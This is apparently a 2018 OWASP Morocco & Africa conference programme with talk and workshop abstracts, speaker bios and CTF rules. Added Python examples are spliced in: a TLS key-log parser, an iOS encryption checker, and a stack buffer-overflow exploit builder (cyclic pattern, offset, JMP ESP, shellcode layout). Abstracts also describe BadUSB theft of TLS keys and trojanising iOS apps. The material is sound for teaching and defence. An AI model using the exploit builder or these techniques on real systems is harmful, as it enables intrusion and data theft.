Welcome to the OWASP Annual AppSec Morocco & Africa Cyber Security Conference, the premier application and cyber security conference for African developers and security experts. AppSec Morocco & Africa gives attendees insight from leading speakers in application security and cyber security, hands-on workshops on applications, mobile, IoT, ICS/SCADA and networking, and exposure to current best practices in cybersecurity.
The event offers eight talks and eight different hands-on workshops between Thursday 15th and Friday 16th of November 2018.
This is an exceptional opportunity to attend one of the many hands-on workshops offered by well-known industry experts and future pioneers of the application and cyber security industry.
There are talks for pen-testers and ethical hackers, developers and security engineers, DevOps practitioners, and GRC/risk-level talks for managers and CISOs.
This year's program covers application security both bottom-up and top-down, based on the SABSA framework and the TOGAF 9 enterprise architecture framework.
We also offer a Capture The Flag.
Welcome.

10:00 - 10:30 Azzeddine Ramrami

Keynote session: Toward a Safer and More Secure Cyberspace

Given the growing importance of cyberspace to nearly all aspects of national life, a secure cyberspace is vitally important to the nation, but cyberspace is far from secure today.

Toward a Safer and More Secure Cyberspace examines these Internet security vulnerabilities and offers a strategy for future research aimed at countering cyber attacks.

It also explores the nature of online threats and some of the reasons why past research for improving cybersecurity has had less impact than anticipated, and considers the human resource base needed to advance the cybersecurity research agenda.

Author's Bio: Azzeddine RAMRAMI
Azzeddine RAMRAMI is a Senior Security Architect at IBM Security and a cyber security researcher at IBM Security X-Force.
Azzeddine RAMRAMI is also the chapter leader for OWASP Morocco and the president of OWASP Africa.

Coffee Break & Networking
Visit our sponsors' exhibit booths for product demos, discussion and more while enjoying a good Moroccan tea.

DevSecOps is so much more than "automating the scan button." In this talk, we will create a continuous, effective, and scalable DevSecOps pipeline using only *free* tools. We'll use IAST (Interactive Application Security Testing) to accurately pinpoint vulnerabilities in real time without scanning.

Then we'll set up RASP (Runtime Application Self-Protection) to gain comprehensive visibility of attacks in operations and prevent exploits. And we'll integrate all of this security vulnerability and attack telemetry into the tools your teams are already using.

We will enable developers with real-time security feedback right in their IDE

We will also ensure that libraries and frameworks are analyzed continuously for vulnerabilities

We'll integrate security into the CI/CD process so that we can easily fail a build

We'll identify application layer attacks and create a whole new level of visibility for your SOC

We'll even prevent exploitation of newly discovered vulnerabilities in open source libraries

After this talk, you'll be able to establish your own DevSecOps pipeline immediately. This reference architecture can be adapted easily to almost any tools and processes -- even legacy applications and waterfall style projects.

Author's Bio: Rali Kettani

Rali Kettani is a Solutions Architect with Contrast Security, an IAST and RASP company that helps organizations incorporate security at DevOps speed. He has been in the technology field for over 15 years, a large part of it in application security. Rali has a background in software development and extensive experience with SAST, IAST and RASP technologies. He has helped dozens of Fortune 500 companies and US government entities modernize their application security practice and move to DevSecOps.

Rali has a Master's degree in Management Information Systems from the George Washington University and a Bachelor's degree in Computer Science from Georgia College. Rali is based out of Washington DC.

Offensive security has long been esoteric knowledge, discussed in closed circles among select groups and shared as black-magic recipes with secret ingredients.
A lot has changed since the days of IRC chat rooms, 0-day exchanges and invite-only conferences. Security is now taught at schools, published in books and presented at conferences.

Despite this progress, offensive security remains for the most part a manual process performed by pentesters, bug hunters or weekend enthusiasts. Most tools in use, both open source and commercial, are glorified brute forcers that test large sets of inputs hoping to find the one that works.

New research and progress have however been made in the past few years, such as:

Introducing techniques from the world of machine learning for fuzzing, like reinforcement learning for input mutation and deep learning for dictionary inference

Enhancing taint tracking for both source code and binary analysis

Tree based testing for black box assessment of web applications

This presentation focuses on the most remarkable progress made in this area, and shares our experience implementing and running these techniques against web, mobile and system applications as part of the largest security scanning infrastructure in the world. We will present the challenges that software assessment presents, like path explosion, formalisation, or simply the sheer randomness of the world of the web and its standards.

Author's Bio: Alaeddine Mesbahi works as a Security Engineer at Google specialized in penetration testing and security source code review.

He is in his own words a Python addict, self-proclaimed green mint tea expert. He enjoys learning new stuff about InfoSec every day, losing at chess and practicing martial arts. Alaeddine holds the Offensive Security Certified Professional (OSCP) and Offensive Security Certified Expert (OSCE) certifications.

Second, why they are critical and vulnerable, and finally the main and critical vulnerabilities that we encounter today in penetration testing engagements.

I will also present a brief demonstration of the tools and the methodology of web service penetration testing.

Author's Bio: Amine El Boukhari
Amine El Boukhari is a senior cyber security consultant and penetration tester at KPMG Paris. He leads various engagements and has been involved in many web services penetration testing engagements.

Security is becoming an increasingly important concern throughout the application development lifecycle, especially for teams practising fast (and furious) continuous delivery with frequent release cycles.

In this workshop, participants will learn how to easily configure and map security tools onto their existing DevOps toolchain, and how to automate this process using cloud-infrastructure automation tools.

The aim is to introduce security controls at the earliest stage of software development (controls while the developer is coding on their own machine), before code is pushed to the shared repository (version control), and finally before (and after) code is deployed to the production environment.

The workshop also provides a technical demo of how to make sure that the initially defined security requirements are continuously respected by the production environment through "continuous security monitoring".

Author's Bio: Abdessamad TEMMAR
Abdessamad TEMMAR is an information security consultant at Abcit, a Moroccan firm fully dedicated to information security. He has delivered security professional services to a wide variety of clients.

Most computer users address the risk of removable media by running an antivirus scan or formatting the entire disk, assuming that this wipes all malware from the mass-storage area of the USB device.

Security researchers have shown that the microcontroller firmware of some USB devices can be reprogrammed. This area is hidden from the user and not accessible to antivirus software or other security controls, and it has been leveraged by criminals and hackers to store malware that executes automatically when the USB device is plugged into a computer.

One of the most widely used recent techniques is the USB HID keyboard attack: a USB flash drive impersonates a Human Interface Device (HID) such as a keyboard in order to type commands automatically and hijack the computer. The same technique now applies to smartphones, which extends the risk for end users.

In this workshop we will walk through several such scenarios hands-on, demonstrating how computers and phones can easily be exploited by reprogrammed firmware, and how a smartphone can be turned into a rogue device or BadUSB to steal sensitive information such as Facebook chats and email credentials even with SSL enabled.

Our added value in this talk is to show how easily the browsers (Chrome and Firefox) can be instructed to write their SSL/TLS master keys to a file of our choice, which is sent to our Gmail account by a script installed from the smartphone, and how those master keys are then used to decrypt the captured traffic.
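The key-export trick described above relies on a documented browser feature: Chrome and Firefox write their TLS session secrets in the NSS key-log format to whatever path the SSLKEYLOGFILE environment variable names. The Python below is an added example, not part of the talk or the speaker's tooling; it parses such a file the way a decryption tool does, indexes the secrets by the ClientHello random that ties each line to a captured session, and includes the environment check a defender would run on a workstation. The key-log lines are constructed for illustration, not captured material.

```python
"""Parse and validate NSS key-log lines (the format Chrome and Firefox write when
SSLKEYLOGFILE is set) and flag an environment that has the variable set.
Added example; the sample lines below are constructed, not captured traffic."""
import re

# Labels the browsers emit: CLIENT_RANDOM for TLS 1.2 (48-byte master secret),
# the rest for TLS 1.3 traffic secrets (32 or 48 bytes depending on the hash).
KEYLOG_LABELS = {
    "CLIENT_RANDOM": (96,),
    "CLIENT_EARLY_TRAFFIC_SECRET": (64, 96),
    "CLIENT_HANDSHAKE_TRAFFIC_SECRET": (64, 96),
    "SERVER_HANDSHAKE_TRAFFIC_SECRET": (64, 96),
    "CLIENT_TRAFFIC_SECRET_0": (64, 96),
    "SERVER_TRAFFIC_SECRET_0": (64, 96),
    "EXPORTER_SECRET": (64, 96),
}
# label, 32-byte client random (64 hex), secret (hex)
LINE_RE = re.compile(r"^([A-Z0-9_]+) ([0-9a-fA-F]{64}) ([0-9a-fA-F]+)$")


def parse_keylog(text):
    """Return (entries, bad): entries are (label, client_random, secret) tuples for
    well-formed lines; comments and blank lines are skipped; bad holds (lineno, line)
    for anything that does not match the format or has a secret of the wrong size."""
    entries, bad = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if (m is None or m.group(1) not in KEYLOG_LABELS
                or len(m.group(3)) not in KEYLOG_LABELS[m.group(1)]):
            bad.append((lineno, line))
            continue
        entries.append((m.group(1), bytes.fromhex(m.group(2)), bytes.fromhex(m.group(3))))
    return entries, bad


def secrets_by_client_random(entries):
    """Index secrets by the ClientHello random: a decryption tool matches a key-log
    line to a captured TLS session on exactly that value."""
    index = {}
    for label, client_random, secret in entries:
        index.setdefault(client_random, {})[label] = secret
    return index


def keylog_exposure(env):
    """Defender-side check: a browser started with SSLKEYLOGFILE in its environment
    writes its session keys to that path. Returns the configured path or None."""
    path = env.get("SSLKEYLOGFILE", "").strip()
    return path or None


# Constructed sample: one TLS 1.2 session, one TLS 1.3 handshake, one malformed line.
SAMPLE_KEYLOG = "\n".join([
    "# SSL/TLS secrets log file, generated by NSS",
    "CLIENT_RANDOM " + "11" * 32 + " " + "22" * 48,
    "CLIENT_HANDSHAKE_TRAFFIC_SECRET " + "33" * 32 + " " + "44" * 32,
    "SERVER_HANDSHAKE_TRAFFIC_SECRET " + "33" * 32 + " " + "55" * 32,
    "CLIENT_RANDOM deadbeef cafe",
])

if __name__ == "__main__":
    entries, bad = parse_keylog(SAMPLE_KEYLOG)
    print(f"{len(entries)} usable secrets, {len(bad)} malformed line(s)")
    for client_random, secrets in secrets_by_client_random(entries).items():
        print(client_random.hex()[:16], sorted(secrets))
    print("SSLKEYLOGFILE set:", keylog_exposure({"SSLKEYLOGFILE": "/tmp/keys.log"}))
```

On a workstation the defender-side check is the interesting half: a browser process whose environment carries SSLKEYLOGFILE is exporting its session keys, and the path it names is where the attacker's script will be reading from.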

Author's Bio: Boumediene KADDOUR is a cyber defense consultant and holds the OSCP and OSWP certifications. He previously worked as Infosec Thief Trainer, then as an Incident Handler and as a Cyber Defense Consultant in Dubai with a company called Malcrove.
He has taken part in many international seminars, where he delivered cyber security talks as a professional speaker.

14:00 - 17:30 Workshop 3 – Benjamin NABET

Modifying an official and trusted iOS application to make it malicious

Starting from an official iOS application published on the App Store, we'll learn how to reverse it in order to embed malicious code and share it. After showing how to dump and decrypt the code (ARM reversing, Mach-O architecture, ...), we'll go through the basics of debugging on the target (dynamic inspection) to analyze the app and spot the sensitive functions and data. We'll then show how to modify the code, re-sign the app and share the malicious version.
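Before an App Store binary can be reversed it has to be decrypted, and the first check is whether it still is: the LC_ENCRYPTION_INFO (32-bit) or LC_ENCRYPTION_INFO_64 load command carries a cryptid field that is non-zero while the code is FairPlay-encrypted. The Python below is an added example, not the workshop's material; it reads that field from a thin Mach-O image, which is the value "otool -l | grep cryptid" shows, and the sample images it checks are constructed inside the script.

```python
"""Check whether an iOS Mach-O binary is still FairPlay-encrypted by reading the
cryptid field of its LC_ENCRYPTION_INFO(_64) load command.
Added example; the Mach-O images below are constructed, not dumped from a device."""
import struct

MH_MAGIC, MH_MAGIC_64 = 0xFEEDFACE, 0xFEEDFACF
LC_UUID, LC_ENCRYPTION_INFO, LC_ENCRYPTION_INFO_64 = 0x1B, 0x21, 0x2C
CPU_TYPE_ARM, CPU_TYPE_ARM64 = 12, 0x0100000C
MH_EXECUTE = 2


def encryption_info(data):
    """Return (cryptoff, cryptsize, cryptid) or None if no encryption command exists.
    Handles thin little-endian images only; a FAT binary must be sliced first."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic == MH_MAGIC_64:
        header_size = 32          # mach_header_64 has a trailing reserved field
    elif magic == MH_MAGIC:
        header_size = 28
    else:
        raise ValueError("not a little-endian Mach-O image")
    ncmds, sizeofcmds = struct.unpack_from("<II", data, 16)
    off, end = header_size, header_size + sizeofcmds
    for _ in range(ncmds):
        if off + 8 > len(data):
            raise ValueError("truncated load command")
        cmd, cmdsize = struct.unpack_from("<II", data, off)
        if cmdsize < 8 or off + cmdsize > end:
            raise ValueError("bad cmdsize")
        if cmd in (LC_ENCRYPTION_INFO, LC_ENCRYPTION_INFO_64):
            # both commands start with cryptoff, cryptsize, cryptid after the header
            return struct.unpack_from("<III", data, off + 8)
        off += cmdsize
    return None


def is_encrypted(data):
    """True when the image still carries encrypted __TEXT (cryptid != 0)."""
    info = encryption_info(data)
    return info is not None and info[2] != 0


def build_sample(cryptid, is64=True):
    """Construct a minimal image: header, an LC_UUID to exercise the walk, then the
    encryption command with the requested cryptid (constructed test data)."""
    uuid_cmd = struct.pack("<II", LC_UUID, 24) + b"\x00" * 16
    if is64:
        enc_cmd = struct.pack("<IIIIII", LC_ENCRYPTION_INFO_64, 24, 0x4000, 0x8000, cryptid, 0)
        cmds = uuid_cmd + enc_cmd
        header = struct.pack("<IIIIIIII", MH_MAGIC_64, CPU_TYPE_ARM64, 0, MH_EXECUTE,
                             2, len(cmds), 0, 0)
    else:
        enc_cmd = struct.pack("<IIIII", LC_ENCRYPTION_INFO, 20, 0x4000, 0x8000, cryptid)
        cmds = uuid_cmd + enc_cmd
        header = struct.pack("<IIIIIII", MH_MAGIC, CPU_TYPE_ARM, 0, MH_EXECUTE,
                             2, len(cmds), 0)
    return header + cmds


if __name__ == "__main__":
    for cryptid in (1, 0):
        img = build_sample(cryptid)
        print(f"cryptid={cryptid}: {encryption_info(img)} encrypted={is_encrypted(img)}")
```

A dumped binary that still reports cryptid 1 was copied from disk rather than from the decrypted memory image, and disassembling it will only show FairPlay ciphertext; the dump has to be retaken from the running process before the reversing steps above make sense.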

Author's Bio: Benjamin NABET - CEO at BESURE (www.bsecure.fr)
Benjamin has worked in cybersecurity since 2002. He has owned Bsecure, a French company, since 2010 and provides security consultancy for both large companies and SMBs. Fond of mobile security, he has worked on mobile application security since 2009 and has helped well-known companies secure their apps.

Capture the Flag Challenges

08:00pm - 08:00am Capture The Flag Details

CTF Start at 8pm on November 15, 2018

The challenge will start on Thursday 15 November 2018 at 20:00 and end the next day at 08:00 Moroccan time.

All participants must be physically present at the location of the CTF (Hotel Val d’Infa Casablanca).

Support will be given in person and using a communication channel shared before the beginning of the challenge.

In order to be eligible for the prizes and be a part of the competition, you must abide by the following rules:

Teams are composed of 3 to 5 players

Do not attack the infrastructure. If you find a problem with one of the tasks, please report it to the organisation team

You are not allowed to attack other teams. Any attempt to cheat in the contest will lead to immediate disqualification

Only team members who are present at the CTF location can be part of the contest. Requesting help from people outside the event location will lead to immediate disqualification

The winner will be the team that collects the most points

Requesting hints in private is forbidden. Hints will be shared with all teams

If two teams have equal scores, the team that reached that score first will have the advantage

In order to be eligible for money prizes, the top 3 teams are expected to deliver write-ups. Write-ups will be made public and shared on the OWASP conference website

We reserve the right to disqualify teams if the write-ups are not sufficiently complete

The organisation team of the conference is not allowed to participate in the challenges

Be respectful of other participants and report any misconduct or discrimination

Description: In this workshop we will look at how to exploit a buffer overflow on Windows systems. We will start from the very basics: reverse engineering a vulnerable application, discovering the buffer overflow and writing the exploit for it. Participants will examine various recognized exploit-writing techniques. They will be led through a series of advanced topics and exercises based on real-world and staged application examples to illustrate the concepts.
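The offset-finding and payload-layout steps of the workshop are normally scripted rather than done by hand. The Python below is an added example, not the workshop's own code: it generates the cyclic pattern used to find where the saved return address sits in the overflowed buffer, converts the value seen in EIP at the crash back into an offset, builds the bad-character probe sent next, and assembles the final buffer. The crash value, return address, shellcode and bad-character set are constructed for illustration and do not come from a real target.

```python
"""Locate the return-address offset in a stack buffer overflow with a cyclic
pattern, then lay out the exploit buffer. Added example; the crash value, return
address and bad characters below are constructed, not taken from a real target."""
import string
import struct


def cyclic_pattern(length):
    """Upper/lower/digit triplets (Aa0Aa1Aa2...): every 4-byte window is unique for
    lengths up to 20280, so whatever lands in EIP identifies its own offset."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += f"{u}{l}{d}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern length exceeds 20280")


def pattern_offset(pattern, crash_value):
    """Offset of the 4 bytes that overwrote EIP; x86 stores them little-endian,
    so the register value read in the debugger is packed before searching."""
    needle = struct.pack("<I", crash_value)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("EIP value not found in pattern: buffer too short or EIP not controlled")
    return idx


def badchar_probe(bad):
    """Every byte 0x01..0xff except those already known bad; sent after the
    offset so the bytes the target mangles can be read off in the debugger."""
    return bytes(b for b in range(1, 256) if b not in bad)


def build_exploit(offset, ret_addr, shellcode, nop_sled=16, bad=()):
    """junk | saved return address (e.g. a JMP ESP gadget) | NOP sled | shellcode.
    Refuses to build a buffer whose address or shellcode contains a bad character."""
    ret = struct.pack("<I", ret_addr)
    for chunk, name in ((ret, "return address"), (shellcode, "shellcode")):
        clash = set(chunk) & set(bad)
        if clash:
            raise ValueError(f"{name} contains bad characters: {sorted(clash)}")
    return b"A" * offset + ret + b"\x90" * nop_sled + shellcode


if __name__ == "__main__":
    # Constructed scenario: a 5000-byte pattern crashed the target with EIP=0x39654138.
    pat = cyclic_pattern(5000)
    off = pattern_offset(pat, 0x39654138)
    print("EIP offset:", off)
    print("bad-char probe length:", len(badchar_probe({0x00, 0x0A, 0x0D})))
    # Hypothetical JMP ESP address and INT3 placeholder shellcode.
    buf = build_exploit(off, 0x625011AF, b"\xCC" * 4, bad=(0x00, 0x0A, 0x0D))
    print("exploit buffer length:", len(buf))
```

The probe is where most first attempts fail: a byte the target strips or translates (0x00 as a string terminator, 0x0a and 0x0d in line-based protocols) corrupts the shellcode silently, so the bad-character list is established before any real payload is sent.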

Lab prerequisites: a PC with a Windows VM.

Author's Bio: Mohamed Oussama Lessis

Oussema Lessis is a cyber security manager at EY. He has been a security enthusiast and researcher since an early age. He has covered multiple topics including, but not limited to:

Description: If you have heard about Docker, containers and Kubernetes but have little (or no!) hands-on experience yet, this fast-paced workshop will get you started.

In this workshop you'll learn:
How to create, modify and interact with container images
Running the Docker client and server in single-host or distributed mode
Building and publishing your own custom images
Scanning your container images
Building your own penetration testing lab
Kubernetes fundamentals
How to use Kubernetes in production
Deploying and managing Docker containers using kubectl
Setting up ReplicaSets, Services and Deployments on Kubernetes
Deploying applications on Kubernetes

Materials or downloads needed in advance: https://github.com/etadata/owasp-workshop/blob/master/README.md

Author's Bio: Abdelhalim Souri
Abdelhalim Souri is a senior security engineer at N+ONE, a leading carrier-neutral datacenter company in Morocco.
His interests include DevSecOps and applying machine learning to detect potential security flaws.
He also enjoys taking part in competitive programming contests.

Securing control systems is a challenge. Off-the-shelf software and hardware, as well as remote access, are increasingly common in industrial environments.
The broader threat landscape and the increased sophistication of attacks indicate the need to bolster the security posture of Operational Technology (OT), and in particular of industrial control systems (ICS) and SCADA environments. But where to begin?
Workshop Contents:

Author's Bio: Azzeddine RAMRAMI
Azzeddine RAMRAMI is a Senior Security Architect at IBM Security and a cyber security researcher at IBM Security X-Force.
Azzeddine RAMRAMI is also the chapter leader for OWASP Morocco and the President of OWASP Africa.